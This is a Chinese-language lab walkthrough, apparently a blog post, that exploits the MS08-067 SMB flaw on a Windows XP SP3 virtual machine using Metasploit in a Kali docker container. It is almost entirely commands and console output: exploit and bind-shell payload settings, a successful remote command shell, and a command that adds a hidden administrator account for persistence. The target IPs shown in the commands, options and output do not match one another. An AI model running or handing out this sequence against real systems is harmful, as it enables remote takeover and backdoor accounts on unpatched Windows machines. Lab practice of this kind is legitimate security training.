MS08-067漏洞會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta
1.安裝靶機
下載window xp sp3 英文版鏡像並安裝在vmvare虛擬機上 靶機ip:192.168.65.128
2.安裝kali linux以及Metasploit框架
ps:系統和框架都是通過docker進行安裝操作的,所以需要先了解一下docker
運行docker 輸入命令 docker pull kalilinux/kali-linux-docker 獲取kali linux鏡像
輸入 docker -it --name kali_linux -p 0.0.0.0:8080:80 kalilinux/kali-linux-docker /bin/bash
創建容器並交互式運行容器 容器ip: 172.17.0.2
輸入 git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit
獲取metasploit框架
完成後輸入 cd ./metasploit進入框架目錄
root@b2e6af248097:/metasploit# ./msfconsole
輸入 ./msfconsole 運行框架,成功後按如下步驟
msf5 > use exploit/windows/smb/ms08_067_netapi #使用MS08067漏洞攻擊程序
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 172.17.0.2:#設置本地主機IP
LHOST => 172.17.0.2:
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOST 192.168.65.128 #設置目標主機IP
RHOST => 192.168.65.129
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_bind_tcp #設置payload
payload => windows/shell_bind_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > show options #查看配置
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.65.129 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LPORT 4444 yes The listen port
RHOST 192.168.65.129 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf5 exploit(windows/smb/ms08_067_netapi) > exploit #實施攻擊
[*] 192.168.46.129:445 - Automatically detecting the target...
[*] 192.168.46.129:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.46.129:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.46.129:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.46.129:4444
[*] Command shell session 1 opened (172.17.0.2:37763 -> 192.168.46.129:4444) at 2018-11-09 09:59:01 +0000
C:\WINDOWS\system32>
攻擊成功,獲取到目標主機cmdshell
接下來新建賬號 添加用戶名爲xiayujie,密碼爲xiayujie的用戶,並把xiayujie用戶添加到管理組
C:\WINDOWS\system32>net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
net user xiayujie xiayujie /add && net localgroup administrators xiayujie /add
The command completed successfully. #添加成功
有了cmdshell權限,接下來想做什麼就都可以了